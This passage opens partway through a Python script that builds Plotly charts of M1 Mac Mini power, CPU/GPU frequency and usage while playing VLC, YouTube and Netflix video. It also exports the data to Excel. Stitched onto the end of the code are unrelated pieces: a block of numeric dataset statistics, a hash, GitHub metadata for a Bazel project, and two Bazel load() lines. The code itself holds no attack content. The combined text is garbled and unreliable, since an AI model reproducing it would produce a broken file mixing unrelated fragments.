        fig.update_yaxes(type='linear', title_font=dict(size=12), color="#707070",
                         title_font_color="#707070", tickfont=dict(size=9),
                         gridcolor='#242424', zerolinecolor='#242424', **extra_y)
        fig.update_xaxes(showgrid=False, title_font=dict(size=10), color="#707070",
                         title_font_color="#707070", tickfont=dict(size=9))

    def _style_bar_axes(fig, y_range, **extra_y):
        # Axis styling shared by the vertical averages bar charts.
        fig.update_yaxes(title_font=dict(size=12), color="#707070",
                         title_font_color="#707070", tickfont=dict(size=9),
                         gridcolor='#242424', zerolinecolor='#242424',
                         range=y_range, **extra_y)
        fig.update_xaxes(zeroline=True, showgrid=False, color="#FFF",
                         title_font_color="#707070", tickfont=dict(size=11),
                         title_text='')

    def _bar_labels(fig, frame, columns, position):
        # Attach per-bar value labels; traces are created in column order.
        for i, column in enumerate(columns):
            fig.data[i].text = frame[column]
            fig.data[i].textposition = position

    def _watermark(fig, x, y, xanchor='right'):
        fig.add_annotation(text="//singhkays.com", xref="paper", yref="paper",
                           xanchor=xanchor, yanchor='top', x=x, y=y,
                           showarrow=False, font=dict(size=14, color='#707070'))

    def _logo(fig, x, y, size):
        fig.add_layout_image(dict(source=kLogo, xref="paper", yref="paper",
                                  x=x, y=y, sizex=size, sizey=size,
                                  xanchor="left", yanchor="bottom"))

    def _export(fig, stem):
        fig.write_html("outputs/" + stem + ".html", include_plotlyjs="cdn", config=config)
        fig.write_image("outputs/" + stem + ".svg")

    # Normalize the raw capture labels to reader-friendly names (in place;
    # mutates the caller's DataFrames, matching the original behavior).
    rename = {'4K-VP9': 'VLC-SW', "Chrome-HW-YT-4K": "Chrome-HW", "Safari-HW-YT-4K": "Safari-HW"}
    dfPower["Video Type"].replace(rename, inplace=True)
    dfFrequency["Video Type"].replace(rename, inplace=True)
    dfUsage["Video Type"].replace(rename, inplace=True)

    # 1. Package power over time, one facet column per player/browser.
    fig = px.area(dfPower.loc[dfPower["Video Type"].isin(browsers)], x='time',
                  y=['Package'], template='plotly_dark', width=700, height=350,
                  facet_col='Video Type', line_shape="spline", facet_col_wrap=5,
                  labels={"value": "Power Consumption (mW)", "time": "Time (s)"},
                  color_discrete_map=package_color,
                  category_orders={"Video Type": browsers})
    _facet_labels(fig)
    _style_time_axes(fig)
    fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing=1.3)
    _base_layout(fig, "Total Package Power Consumption over Time", 0.92,
                 dict(r=50, t=80), hovermode="x", showlegend=False)
    _watermark(fig, 1.05, 1.3)
    _logo(fig, -0.12, 1.17, 0.2)
    _export(fig, "plotly-power-package-browser")

    # 2. Per-component power over time, one facet row per player/browser.
    fig = px.line(dfPower.loc[dfPower["Video Type"].isin(browsers)], x='time',
                  y=components, template='plotly_dark', width=700, height=900,
                  facet_row='Video Type', line_shape="spline", render_mode="svg",
                  color_discrete_map=component_colors,
                  labels={"value": "Power Consumption (mW)", "time": "Time (s)"},
                  # Row order intentionally differs from the facet-column charts.
                  category_orders={"Video Type": ["VLC-SW", "Chrome-SW", "Safari-HW", "Chrome-HW"]})
    fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
    for annotation in fig['layout']['annotations']:
        # Un-rotate each row label and nudge it to sit above its subplot.
        annotation['textangle'] = 0
        annotation['xanchor'] = 'right'
        annotation['x'] = annotation['x'] - 0.002
        annotation['y'] = annotation['y'] + 0.038
        annotation['font'] = dict(family=font_family, size=13)
    fig.update_yaxes(type='linear', title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_xaxes(showgrid=False, color="#707070", title_font_color="#707070",
                     tickfont=dict(size=9))
    # No line_smoothing here (unlike the other over-time charts) — this chart
    # originally disabled it, presumably for SVG render cost; kept as-is.
    fig.update_traces(hovertemplate='%{y} (mW)')
    _base_layout(fig, "Power Consumption over Time", 0.97, dict(r=30, t=80),
                 legend_title_text='', hovermode="x", legend=legend_above)
    _watermark(fig, 0.85, 0.75, xanchor='left')
    _logo(fig, -0.12, 1.04, 0.067)
    _export(fig, "plotly-power-total-browser")

    # 3. Average power per component (grouped vertical bars).
    # NOTE(review): GroupBy.mean() without numeric_only relies on pandas
    # silently dropping non-numeric columns; newer pandas raises — confirm
    # against the pinned pandas version.
    barDf = (dfPower.loc[dfPower["Video Type"].isin(browsers)]).groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type', y=components, template='plotly_dark',
                 orientation='v', hover_name='Video Type', width=700, height=400,
                 barmode='group', color_discrete_map=component_colors,
                 labels={"value": "Power Consumption (mW)"},
                 category_orders={"Video Type": browsers})
    _style_bar_axes(fig, [0, 1100])
    fig.update_traces(hovertemplate='%{y:.0f} (mW)', texttemplate='%{y:.0f}',
                      textfont=dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
    _base_layout(fig, "Average Power Consumption", 0.93, dict(r=30, b=0, t=80),
                 hovermode=False, legend_title_text='', legend=legend_above)
    _bar_labels(fig, barDf, components, 'outside')
    _watermark(fig, 0.99, 0.86)
    _logo(fig, -0.12, 1.12, 0.145)
    _export(fig, "plotly-power-average-browser")

    # 4. Total (package) average power, horizontal bars.
    barDf = (dfPower.loc[dfPower["Video Type"].isin(browsers)]).groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark',
                 orientation='h', hover_name='Video Type', width=700, height=250,
                 color_discrete_map=package_color,
                 labels={"value": "Power Consumption (mW)"},
                 category_orders={"Video Type": ["Safari-HW", "Chrome-HW", "Chrome-SW", "VLC-SW"]})
    fig.update_xaxes(zeroline=True, title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_yaxes(zeroline=True, showgrid=False, color="#FFF",
                     title_font_color="#707070", tickfont=dict(size=11), title_text='')
    fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW',
                      textfont=dict(size=11))
    _base_layout(fig, "Average Power Consumption", 0.90, dict(r=30, b=15, t=60),
                 hovermode=False, legend_title_text='', showlegend=False)
    # Fix: removed a leftover debug print that dumped the label series here.
    _bar_labels(fig, barDf, ['Package'], 'inside')
    _watermark(fig, 0.99, 1)
    _logo(fig, -0.18, 1.099, 0.29)
    _export(fig, "plotly-power-average-total-browser")

    # 5. CPU-cluster/GPU frequency over time.
    fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(browsers)], x='time',
                  y=clusters, template='plotly_dark', width=700, height=350,
                  facet_col='Video Type', line_shape="spline", render_mode="svg",
                  facet_col_wrap=5, color_discrete_map=component_colors,
                  labels={"value": "Frequency (MHz)", "time": "Time (s)"},
                  category_orders={"Video Type": browsers})
    _facet_labels(fig)
    _style_time_axes(fig)
    fig.update_traces(hovertemplate='%{y} MHz', line_smoothing=1.3)
    _base_layout(fig, "Frequency over Time", 0.92, dict(r=50, t=80),
                 legend_title_text='', hovermode="x", legend=legend_below)
    _watermark(fig, 1.05, 1.3)
    _logo(fig, -0.125, 1.19, 0.22)
    _export(fig, "plotly-frequency-browser")

    # 6. Average frequency per cluster (grouped vertical bars).
    barDf = (dfFrequency.loc[dfFrequency["Video Type"].isin(browsers)]).groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type', y=clusters, template='plotly_dark',
                 orientation='v', hover_name='Video Type', width=700, height=350,
                 barmode='group', color_discrete_map=component_colors,
                 labels={"value": "Frequency (MHz)"},
                 category_orders={"Video Type": browsers})
    _style_bar_axes(fig, [0, 1650])
    # Fix: values are MHz (see the axis label above) — the hover used to say "(Hz)".
    fig.update_traces(hovertemplate='%{y:.0f} (MHz)', texttemplate='%{y:.0f}',
                      textfont=dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
    _base_layout(fig, "Average Frequency", 0.92, dict(r=30, b=0, t=80),
                 hovermode=False, legend_title_text='', legend=legend_above)
    _bar_labels(fig, barDf, clusters, 'outside')
    _watermark(fig, 0.99, 1.25)
    _logo(fig, -0.12, 1.15, 0.18)
    _export(fig, "plotly-frequency-average-browser")

    # 7. CPU-cluster/GPU usage over time.
    fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(browsers)], x='time',
                  y=clusters, template='plotly_dark', width=700, height=350,
                  facet_col='Video Type', line_shape="spline", render_mode="svg",
                  facet_col_wrap=5, color_discrete_map=component_colors,
                  labels={"value": "Usage (%)", "time": "Time (s)"},
                  category_orders={"Video Type": browsers})
    _facet_labels(fig)
    _style_time_axes(fig, ticksuffix="%")
    fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing=1.3)
    _base_layout(fig, "Usage over Time", 0.92, dict(r=50, t=80),
                 legend_title_text='', hovermode="x", legend=legend_below)
    _watermark(fig, 1.05, 1.3)
    _logo(fig, -0.125, 1.19, 0.22)
    _export(fig, "plotly-usage-browser")

    # 8. Average usage per cluster (grouped vertical bars).
    barDf = (dfUsage.loc[dfUsage["Video Type"].isin(browsers)]).groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type', y=clusters, template='plotly_dark',
                 orientation='v', hover_name='Video Type', width=700, height=350,
                 barmode='group', color_discrete_map=component_colors,
                 labels={"value": "Usage (%)"},
                 category_orders={"Video Type": browsers})
    _style_bar_axes(fig, [0, 32], ticksuffix="%")
    fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %',
                      textfont=dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
    _base_layout(fig, "Average Usage", 0.92, dict(r=30, b=0, t=80),
                 hovermode=False, legend_title_text='', legend=legend_above)
    _bar_labels(fig, barDf, clusters, 'outside')
    _watermark(fig, 1, 1.25)
    _logo(fig, -0.12, 1.15, 0.18)
    _export(fig, "plotly-usage-average-browser")
def buildNetflixCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
    """Build and export the Netflix (Safari vs Chrome) comparison charts.

    Produces line charts (power / frequency / usage over time) and bar charts
    (per-component and total averages) for the two Netflix playback
    configurations, writing each figure as both HTML and SVG under outputs/.

    NOTE: mutates the three input dataframes in place by renaming the Netflix
    "Video Type" values to their chart display names.

    Args:
        dfPower:     per-sample power readings (mW) with a "Video Type" column.
        dfFrequency: per-sample CPU/GPU frequency readings (MHz).
        dfUsage:     per-sample CPU/GPU usage readings (%).
        config:      plotly config dict passed to every write_html call.
        kLogo:       logo image stamped onto every chart.
    """
    # Shared styling constants — these were previously copy-pasted per chart.
    fontFamily = "SF Pro Display, Roboto, Droid Sans, Arial"
    subtitle = "Apple Mac Mini M1 | Netflix Queen's Gambit | MacOS 11.2.2"
    netflixTypes = ["Safari (H.265 1080p)", "Chrome (VP9 720p)"]
    componentColors = {
        "Efficiency Cluster": "#73A4FF",
        "Performance Cluster": "#FF715A",
        "DRAM": "#C590FF",
        "GPU": "#01F0B0",
        "Other": "#FEAF73",
    }

    def _title(text, y):
        # Standard chart title dict: bold heading plus the common subtitle.
        return {'text': f"<b>{text}</b> <br> <sup> {subtitle} </sup>",
                'y': y,
                'x': 0.54,
                'xanchor': 'center',
                'yanchor': 'top',
                'font': dict(size=18, color='#FFF')}

    def _brand(fig, annX, annY, logoX, logoY, logoSize, annXanchor='right'):
        # Watermark text plus the site logo, positioned per chart.
        fig.add_annotation(text="//singhkays.com",
                           xref="paper", yref="paper", xanchor=annXanchor, yanchor='top',
                           x=annX, y=annY, showarrow=False,
                           font=dict(size=14, color='#707070'))
        fig.add_layout_image(
            dict(
                source=kLogo,
                xref="paper", yref="paper",
                x=logoX, y=logoY,
                sizex=logoSize, sizey=logoSize,
                xanchor="left", yanchor="bottom"
            )
        )

    def _export(fig, stem):
        # Every chart is written both as interactive HTML and as static SVG.
        fig.write_html(f"outputs/{stem}.html", include_plotlyjs="cdn", config=config)
        fig.write_image(f"outputs/{stem}.svg")

    def _label_bars(fig, columns, position):
        # Attach per-bar value labels; one pandas Series per trace, in trace order.
        for i, series in enumerate(columns):
            fig.data[i].text = series
            fig.data[i].textposition = position

    # Rename the raw log labels to their display names (in place).
    renameMap = {"Safari-Netflix-1080p": "Safari (H.265 1080p)",
                 "Chrome-Netflix-720p": "Chrome (VP9 720p)"}
    for df in (dfPower, dfFrequency, dfUsage):
        df["Video Type"].replace(renameMap, inplace=True)

    # ---- Figure: package power over time -------------------------------------
    fig = px.line(dfPower.loc[dfPower["Video Type"].isin(netflixTypes)], x='time', y=['Package'],
                  template='plotly_dark', width=700, height=350,
                  color='Video Type', line_shape="spline", render_mode="svg",
                  color_discrete_map={"Safari (H.265 1080p)": "#19C0FC",
                                      "Chrome (VP9 720p)": "#FAD108"},
                  labels={"value": "Power Consumption (mW)", "time": "Time (s)"})
    # Strip the "Video Type=" prefix plotly puts on facet annotations.
    fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
    for annotation in fig['layout']['annotations']:
        annotation['font'] = dict(family=fontFamily, size=11)
    fig.update_yaxes(type='linear', title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_xaxes(showgrid=False, title_font=dict(size=10), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9))
    fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing=1.3)
    fig.update_layout(autosize=True, hovermode="x", legend_title_text='',
                      legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Total Package Power Consumption over Time", 0.92),
                      margin=dict(r=50, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _brand(fig, 1.05, 1.1, -0.125, 1.18, 0.21)
    _export(fig, "plotly-power-package-netflix")

    # ---- Figure: per-component power over time (one facet row per browser) ---
    fig = px.line(dfPower.loc[dfPower["Video Type"].isin(netflixTypes)], x='time',
                  y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'],
                  template='plotly_dark', width=700, height=500,
                  facet_row='Video Type', line_shape="spline", render_mode="svg",
                  color_discrete_map=componentColors,
                  labels={"value": "Power Consumption (mW)", "time": "Time (s)"},
                  category_orders={"Video Type": netflixTypes})
    fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
    # Move each facet-row label from the rotated side position to above its subplot.
    for annotation in fig['layout']['annotations']:
        annotation['textangle'] = 0
        annotation['xanchor'] = 'right'
        annotation['x'] = annotation['x'] - 0.002
        annotation['y'] = annotation['y'] + 0.088
        annotation['font'] = dict(family=fontFamily, size=13)
    fig.update_yaxes(type='linear', title_font=dict(size=10), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_xaxes(showgrid=False, title_font=dict(size=11), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9))
    fig.update_traces(hovertemplate='%{y} (mW)')
    fig.update_layout(legend_title_text='', autosize=True, hovermode="x",
                      legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Power Consumption over Time", 0.94),
                      margin=dict(r=30, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _brand(fig, 0.8, -0.1, -0.12, 1.09, 0.12, annXanchor='left')
    _export(fig, "plotly-power-total-netflix")

    # ---- Bar chart: average power by component -------------------------------
    barDf = dfPower.loc[dfPower["Video Type"].isin(netflixTypes)].groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type',
                 y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'],
                 template='plotly_dark', orientation='v', hover_name='Video Type',
                 width=700, height=400, barmode='group',
                 color_discrete_map=componentColors,
                 labels={"value": "Power Consumption (mW)"},
                 category_orders={"Video Type": netflixTypes})
    fig.update_yaxes(title_font=dict(size=12), color="#707070", title_font_color="#707070",
                     tickfont=dict(size=9), gridcolor='#242424', zerolinecolor='#242424',
                     range=[0, 65])
    fig.update_xaxes(zeroline=True, showgrid=False, color="#FFF", title_font_color="#707070",
                     tickfont=dict(size=11), title_text='')
    fig.update_traces(hovertemplate='%{y:.0f} (mW)', texttemplate='%{y:.0f}',
                      textfont=dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
    fig.update_layout(autosize=True, hovermode=False, legend_title_text='',
                      legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Average Power Consumption", 0.93),
                      margin=dict(r=30, b=0, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _label_bars(fig, [barDf['Efficiency Cluster'], barDf['Performance Cluster'],
                      barDf['DRAM'], barDf['GPU'], barDf['Other']], 'outside')
    _brand(fig, 0.99, 0.9, -0.12, 1.12, 0.145)
    _export(fig, "plotly-power-average-netflix")

    # ---- Horizontal bar chart: total average package power -------------------
    barDf = dfPower.loc[dfPower["Video Type"].isin(netflixTypes)].groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark',
                 orientation='h', hover_name='Video Type', width=700, height=200,
                 color_discrete_map={"Package": "#57FFBC"},
                 labels={"value": "Power Consumption (mW)"},
                 # Fixed: this previously listed the VLC/YouTube labels
                 # ("Safari-HW", "VLC-SW", ...), which never occur in this data.
                 category_orders={"Video Type": netflixTypes})
    fig.update_xaxes(zeroline=True, title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_yaxes(zeroline=True, showgrid=False, color="#FFF", title_font_color="#707070",
                     tickfont=dict(size=11), title_text='')
    fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW',
                      textfont=dict(size=11))
    fig.update_layout(autosize=True, hovermode=False, legend_title_text='',
                      showlegend=False, font=dict(family=fontFamily),
                      title=_title("Average Power Consumption", 0.87),
                      margin=dict(r=30, b=15, t=60), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    # (Leftover debug print of the label series removed.)
    _label_bars(fig, [barDf['Package']], 'inside')
    _brand(fig, 1.02, 1.5, -0.27, 1.16, 0.49)
    _export(fig, "plotly-power-average-total-netflix")

    # ---- Figure: CPU/GPU frequency over time ---------------------------------
    fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(netflixTypes)], x='time',
                  y=['Efficiency Cluster', 'Performance Cluster', 'GPU'],
                  template='plotly_dark', width=700, height=350,
                  facet_col='Video Type', line_shape="spline", render_mode="svg",
                  facet_col_wrap=5,
                  color_discrete_map=componentColors,
                  labels={"value": "Frequency (MHz)", "time": "Time (s)"},
                  category_orders={"Video Type": netflixTypes})
    fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
    for annotation in fig['layout']['annotations']:
        annotation['font'] = dict(family=fontFamily, size=11)
    fig.update_yaxes(type='linear', title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424')
    fig.update_xaxes(showgrid=False, title_font=dict(size=10), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9))
    fig.update_traces(hovertemplate='%{y} MHz', line_smoothing=1.3)
    fig.update_layout(legend_title_text='', autosize=True, hovermode="x",
                      legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Frequency over Time", 0.92),
                      margin=dict(r=50, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _brand(fig, 1.05, 1.3, -0.125, 1.19, 0.22)
    _export(fig, "plotly-frequency-netflix")

    # ---- Bar chart: average frequency ----------------------------------------
    barDf = dfFrequency.loc[dfFrequency["Video Type"].isin(netflixTypes)].groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type',
                 y=['Efficiency Cluster', 'Performance Cluster', 'GPU'],
                 template='plotly_dark', orientation='v', hover_name='Video Type',
                 width=700, height=350, barmode='group',
                 color_discrete_map=componentColors,
                 labels={"value": "Frequency (MHz)"},
                 category_orders={"Video Type": netflixTypes})
    fig.update_yaxes(title_font=dict(size=12), color="#707070", title_font_color="#707070",
                     tickfont=dict(size=9), gridcolor='#242424', zerolinecolor='#242424',
                     range=[0, 1250])
    fig.update_xaxes(zeroline=True, showgrid=False, color="#FFF", title_font_color="#707070",
                     tickfont=dict(size=11), title_text='')
    # Fixed hover unit: the axis and labels report MHz, not Hz.
    fig.update_traces(hovertemplate='%{y:.0f} (MHz)', texttemplate='%{y:.0f}',
                      textfont=dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
    fig.update_layout(autosize=True, hovermode=False, legend_title_text='',
                      legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Average Frequency", 0.92),
                      margin=dict(r=30, b=0, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _label_bars(fig, [barDf['Efficiency Cluster'], barDf['Performance Cluster'],
                      barDf['GPU']], 'outside')
    _brand(fig, 0.99, 1.25, -0.12, 1.15, 0.18)
    _export(fig, "plotly-frequency-average-netflix")

    # ---- Figure: CPU/GPU usage over time -------------------------------------
    fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(netflixTypes)], x='time',
                  y=['Efficiency Cluster', 'Performance Cluster', 'GPU'],
                  template='plotly_dark', width=700, height=350,
                  facet_col='Video Type', line_shape="spline", render_mode="svg",
                  facet_col_wrap=5,
                  color_discrete_map=componentColors,
                  labels={"value": "Usage (%)", "time": "Time (s)"},
                  category_orders={"Video Type": netflixTypes})
    fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
    for annotation in fig['layout']['annotations']:
        annotation['font'] = dict(family=fontFamily, size=11)
    fig.update_yaxes(type='linear', title_font=dict(size=12), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9),
                     gridcolor='#242424', zerolinecolor='#242424', ticksuffix="%")
    fig.update_xaxes(showgrid=False, title_font=dict(size=10), color="#707070",
                     title_font_color="#707070", tickfont=dict(size=9))
    fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing=1.3)
    fig.update_layout(legend_title_text='', autosize=True, hovermode="x",
                      legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Usage over Time", 0.92),
                      margin=dict(r=50, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _brand(fig, 1.05, 1.3, -0.125, 1.19, 0.22)
    _export(fig, "plotly-usage-netflix")

    # ---- Bar chart: average usage by component -------------------------------
    barDf = dfUsage.loc[dfUsage["Video Type"].isin(netflixTypes)].groupby(['Video Type']).mean().reset_index()
    fig = px.bar(barDf, x='Video Type',
                 y=['Efficiency Cluster', 'Performance Cluster', 'GPU'],
                 template='plotly_dark', orientation='v', hover_name='Video Type',
                 width=700, height=350, barmode='group',
                 color_discrete_map=componentColors,
                 labels={"value": "Usage (%)"},
                 category_orders={"Video Type": netflixTypes})
    fig.update_yaxes(title_font=dict(size=12), color="#707070", title_font_color="#707070",
                     tickfont=dict(size=9), gridcolor='#242424', zerolinecolor='#242424',
                     range=[0, 20], ticksuffix="%")
    fig.update_xaxes(zeroline=True, showgrid=False, color="#FFF", title_font_color="#707070",
                     tickfont=dict(size=11), title_text='')
    fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %',
                      textfont=dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
    fig.update_layout(autosize=True, hovermode=False, legend_title_text='',
                      legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
                      font=dict(family=fontFamily),
                      title=_title("Average Usage", 0.92),
                      margin=dict(r=30, b=0, t=80), margin_pad=10,
                      modebar=dict(orientation='v'),
                      plot_bgcolor='#191C1F', paper_bgcolor='#191C1F')
    _label_bars(fig, [barDf['Efficiency Cluster'], barDf['Performance Cluster'],
                      barDf['GPU']], 'outside')
    _brand(fig, 1, 1.25, -0.12, 1.15, 0.18)
    _export(fig, "plotly-usage-average-netflix")
def outputExcel(dfPower, dfFrequency, dfUsage):
    """Export the power/frequency/usage dataframes to outputs/output.xlsx.

    Each dataframe goes to its own sheet ('power', 'frequency', 'usage') with
    the header row/first column frozen and no index column.
    """
    # Use the writer as a context manager: it finalizes and closes the workbook
    # on exit. ExcelWriter.save() was deprecated and removed in pandas 2.0.
    with pd.ExcelWriter('outputs/output.xlsx') as writer:
        # Write a different sheet for each dataframe
        dfPower.to_excel(writer, sheet_name='power', freeze_panes=(1, 1), index=False)
        dfFrequency.to_excel(writer, sheet_name='frequency', freeze_panes=(1, 1), index=False)
        dfUsage.to_excel(writer, sheet_name='usage', freeze_panes=(1, 1), index=False)
        print("Exporting Excel file...")
def main():
    """Entry point: parse every powermetrics log, build all charts, export Excel.

    Expects a "powermetric-logs" folder in the current working directory whose
    files are powermetrics text dumps named after the video configuration
    (e.g. "4K-AV1.mp4.txt", "Safari-VP9-HW.txt").
    """
    start_time = time.time()
    print("Starting at = ", time.ctime(start_time))
    # Current directory should have a folder named powermetric-logs which
    # contains the output logs of powermetrics runs.
    pathLogsFolder = os.path.join(os.getcwd(), "powermetric-logs")
    powerLogsList = os.listdir(pathLogsFolder)
    # Accumulator dataframes, grown one log file at a time.
    dfPower, dfFrequency, dfUsage = pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
    for logsFile in powerLogsList:
        logPath = os.path.join(pathLogsFolder, logsFile)
        if not os.path.isfile(logPath):
            print('File does not exist.')
            continue
        # "with" guarantees the log handle is closed (it previously leaked).
        with open(logPath, 'r', encoding="utf8", errors='ignore') as logHandle:
            content = logHandle.read()
        f_name = os.path.splitext(logsFile)[0]
        if ('mp4' in logsFile) or ('webm' in logsFile):
            # Transform "4K-AV1.mp4.txt" -> "4K-AV1": drop both the .txt
            # extension and the video container, since charts use the bare name.
            videoType = f_name.split('.')[0]
        else:
            # File names without a container, e.g. "Safari-VP9-HW.txt".
            videoType = f_name
        # Parse the content and append to the accumulated dataframes.
        dfPowerTemp, dfFrequencyTemp, dfUsageTemp = regexParse(content, videoType)
        dfPower = pd.concat([dfPower, dfPowerTemp], ignore_index=True)
        dfFrequency = pd.concat([dfFrequency, dfFrequencyTemp], ignore_index=True)
        dfUsage = pd.concat([dfUsage, dfUsageTemp], ignore_index=True)
    # Common Plotly config parameter passed to each chart.
    config = {
        'modeBarButtonsToRemove': ['toggleSpikelines', 'hoverClosestCartesian',
                                   'hoverCompareCartesian', 'select2d', 'lasso2d'],
        'displaylogo': False,
    }
    # Logo file stamped onto each chart.
    kLogo = Image.open("favicon-97x98-white.png")
    # Build charts and output the Excel file.
    buildVLCCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
    buildYouTubeCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
    buildNetflixCharts(dfPower, dfFrequency, dfUsage, config, kLogo)
    outputExcel(dfPower, dfFrequency, dfUsage)
    end_time = time.time()
    print("Ending at = ", time.ctime(end_time))
    # Fixed message wording: was "Time (s) to compute", a find/replace artifact.
    print(f"It took {end_time-start_time:.2f} seconds to compute")
# Run the pipeline only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
| 48.573148
| 222
| 0.596464
| 9,782
| 76,697
| 4.589654
| 0.053363
| 0.025481
| 0.022185
| 0.019645
| 0.918367
| 0.911997
| 0.899457
| 0.89616
| 0.887518
| 0.882194
| 0
| 0.06058
| 0.219383
| 76,697
| 1,579
| 223
| 48.573148
| 0.689299
| 0.094241
| 0
| 0.740924
| 0
| 0.019802
| 0.272563
| 0.032125
| 0
| 0
| 0
| 0.000633
| 0
| 1
| 0.004951
| false
| 0
| 0.010726
| 0
| 0.016502
| 0.006601
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca5ba567a759b2c0b706aadfdf0362dacff6069d
| 51,664
|
bzl
|
Python
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 5
|
2021-09-26T01:16:26.000Z
|
2022-03-18T17:21:23.000Z
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 59
|
2021-09-23T04:19:33.000Z
|
2022-03-29T07:47:10.000Z
|
bazelrio/dependencies/wpilib/2022_1_1_beta_1/deps.bzl
|
noamzaks/bazelrio
|
1684b66865e655fc0f3832f0e3602e905a1d4035
|
[
"MIT"
] | 2
|
2021-11-18T10:34:16.000Z
|
2021-11-21T06:15:07.000Z
|
# Bring in Bazel's archive/JAR repository rules and the repo's shared
# cc_library build-file templates used by the dependency definitions below.
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_jar")
load("@bazel_tools//tools/build_defs/repo:jvm.bzl", "jvm_maven_import_external")
